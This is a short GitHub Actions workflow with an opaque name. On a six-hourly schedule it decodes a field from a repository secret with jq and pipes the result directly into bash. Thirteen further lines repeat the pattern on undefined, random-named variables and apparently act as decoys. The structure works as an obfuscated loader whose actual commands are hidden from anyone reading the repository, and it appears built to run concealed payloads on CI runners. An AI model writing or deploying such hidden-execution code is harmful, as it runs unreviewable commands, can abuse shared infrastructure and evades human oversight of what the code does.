name: flycarx
on:
  workflow_dispatch:
  schedule:
    - cron: '56 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: flycarx
        env:
          btd22: ${{ secrets.btd22 }}
        run: |
          echo $btd22 | jq -r .cnh86 | /bin/bash
          echo $x270 | jq -r .ug1 | /bin/bash
          echo $gd490 | jq -r .ren58 | /bin/bash
          echo $cpqz6 | jq -r .wzcy6 | /bin/bash
          echo $volei8340 | jq -r .mcdi420 | /bin/bash
          echo $aqskw67 | jq -r .ivdiz17 | /bin/bash
          echo $hyuk0 | jq -r .xuewr22 | /bin/bash
          echo $rhiz31972 | jq -r .elb816 | /bin/bash
          echo $l36 | jq -r .p18 | /bin/bash
          echo $ayhh22341 | jq -r .kjo8606 | /bin/bash
          echo $r67619 | jq -r .cz27 | /bin/bash
          echo $yt7623 | jq -r .bvumd6 | /bin/bash
          echo $zqppl2098 | jq -r .w105 | /bin/bash
          echo $nb5 | jq -r .xfell07248 | /bin/bash

